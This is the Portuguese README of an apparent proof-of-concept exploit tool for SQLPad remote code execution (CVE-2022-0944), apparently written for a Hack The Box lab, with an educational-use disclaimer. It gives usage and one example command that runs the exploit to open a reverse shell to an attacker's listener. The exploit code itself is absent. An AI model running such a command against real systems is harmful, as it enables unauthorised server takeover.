
Exploit de prova de conceito para RCE do SQLPad (CVE-2022-0944) que aciona um shell reverso para um listener controlado pelo atacante. Destinado ao uso educacional em cibersegurança.
Prova de conceito de exploit para SQLPad RCE (CVE-2022-0944) levando a um RCE com uma reverse shell para o PC do atacante.
usage: script.py URL IP PORT
positional arguments:
URL URL to SQLPad
IP Listener host address for reverse shell
PORT Listener port for reverse shell
Exemplo:
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
Este repositório contém ferramentas destinadas exclusivamente a fins educacionais, especificamente para uso em ambientes de aprendizado de cibersegurança. O autor deste código não assume nenhuma responsabilidade por quaisquer consequências decorrentes do uso, uso indevido ou modificação deste código. O código é fornecido "no estado em que se encontra" sem qualquer garantia, expressa ou implícita, incluindo, mas não se limitando a, garantias implícitas de comercialização ou adequação a um propósito determinado.